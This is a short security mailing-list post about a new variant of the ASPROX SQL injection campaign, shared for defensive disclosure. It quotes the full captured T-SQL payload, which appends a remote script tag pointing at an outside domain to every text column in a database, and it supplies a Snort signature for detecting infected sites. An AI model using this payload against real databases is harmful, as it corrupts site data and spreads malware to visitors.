[Emerging-Sigs] Another ASPROX Snort rule

[Greg Martin]

ASPROX payload morphed

New domains found and new javascript payload "ngg.js" replaced the  
previous "b.js" starting just a couple of days ago.  And it doesn't  
seem to be wasting any time:
http://www.google.com/search?q=ngg.js    Results 1 - 10 of about  
19,300 for ngg.js. (0.03 seconds)

DECLARE @T VARCHAR(255), at C VARCHAR(255) DECLARE Table_Cursor CURSOR  
FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE  
a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231  
OR b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO  
@T, at C WHILE(@@FETCH_STATUS=0) BEGIN EXEC('UPDATE ['+ at T+'] SET ['+ at C 
+']=RTRIM(CONVERT(VARCHAR(4000),['+ at C+']))+''script src=http://www.apidad.com/ngg.js 
  /script''') FETCH NEXT FROM Table_Cursor INTO @T, at C END CLOSE  
Table_Cursor DEALLOCATE Table_Cursor

Snort signature to detect access of infected site:

alert tcp $HOME_NET any -> $EXTERNAL_NET $HTTP_PORTS (msg:"ASPROX  
Infected Site - ngg.js Request"; flow:established,to_server;  
uricontent:"/ngg.js"; classtype:trojan-activity;  
reference:url,infosec20.blogspot.com/; rev:1; sid:4000002;)

-G

Greg Martin
Director InfoSecurity
Econet Inc. - Sentinel IPS
972.991.5005 x102
http://infosec20.blogspot.com